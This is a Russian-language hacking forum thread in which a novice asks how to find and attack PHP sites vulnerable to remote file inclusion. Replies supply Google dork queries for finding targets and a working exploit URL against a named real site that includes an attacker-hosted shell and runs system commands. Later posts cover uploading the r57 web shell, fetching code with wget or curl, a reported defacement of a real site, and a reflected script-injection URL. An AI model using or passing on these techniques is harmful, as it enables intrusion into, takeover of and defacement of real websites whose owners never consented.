|
Php инклудинг
Привет!Может ктонибуть подсказать как искать сайты с пхп инжекцией!Я вчера полинета перерыл но нашел только один!!Подскжите как их искать или скажите несколько сайтов у которых есть эта уезвимость!ПЛИИЗ!
|
Есть такое понятие поисковик! =)
Есть такое понятие поисковик! =)
Юзай www.Google.ru Можно искать запросами: inurl:"page.php?page=" filetype:php inurl:"index.php?page=" filetype:php inurl:"page.php?page=" site:.ru inurl:"page.php?p=" site:.ru inurl:"index.php?page=" site:.com Ну там много разных вариаций. |
половина из них сдохла, но может найдешь действующие
на удаленом хосте должен быть файл plog-functions.php Код HTML:
http://www.magnapop.com/photos/admin/plog-admin-functions.php?config[basedir]= |
Ну чёт я не понял!!Я нашел сайт с инжекцией!!!Нашел файл залил его к себе на сайт а мне пишут
Fatal error: Cannot redeclare add_comment() (previously declared in /home/musicbco/public_html/ploggerb2/admin/plog-admin-functions.php:537) in http://site.narod.ru/plog-functions.php on line 377 |
учи матчасть =)
http://php.rinet.ru/manual/ru/function.include.php |
plog-functions.php должен быть шелл, либо от rst либо самописный, типа
PHP код:
Вот пример конечной ссылки: admin/plog-admin-functions.php?config[basedir]=http://Пурум-пум-пум.narod.ru&cmd=id;pwd;uname+-a;ls+-la причем http://Пурум-пум-пум.narod.ru/plog-functions.php это шелл-код |
max_pain89!я нашел из списка сайт!Дефейснул его как ты сказал!!!!На пиши плиииззз описание этой уязвимости и как её искать
|
Кстати я залил в файл plog-functions.php шелл r57shell.php!начал дефейсить!Но выходит сообщение
Parse error: parse error, unexpected $, expecting ')' in http://framhack.narod.ru/plog-functions.php on line 787 что это и как можно исправить |
анти4ат против дефэйсов
|
ОК!Небуду дефейсить!Ну расскажи!ПЛИЗ!
|
это связано с тем, что не успевает скачаться код, лучше сначало закачай шелл в доступную папку ( по дефолту ../uploads)
|
хм!А какими командами или как их туда залить
|
Кстати!А где можно скачать статьи по инклуду,подробное описани атаки и самой уезвимости
|
Качалок много, популярные wget, fetch, curl. Синтакс где-нито сам найди. А на счет статей не знаю.
|
Цитата:
|
Или тут почитай! http://store-room.h15.ru
|
учи матчасть =)
http://php.rinet.ru/manual/ru/function.include.php =))) еще пару раз и я устану =))) |
ОК!:))
|
А что означает сообщение
Warning: main(inc/plantillas/): failed to open stream: No such file or directory in /home/guiamani/public_html/page.php on line 17 Warning: main(inc/plantillas/): failed to open stream: No such file or directory in /home/guiamani/public_html/page.php on line 17 Warning: main(): Failed opening 'inc/plantillas/' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/guiamani/public_html/page.php on line 17 |
fram, ты прикалываешься? Надеюсь что да =)))
Это значит что файла или директории не существует по указанному пути |
http://store-room.h15.ru/index.php?m=%3Cscript%3Ealert(/wj/)%3C/script%3E
|
| Время: 05:24 |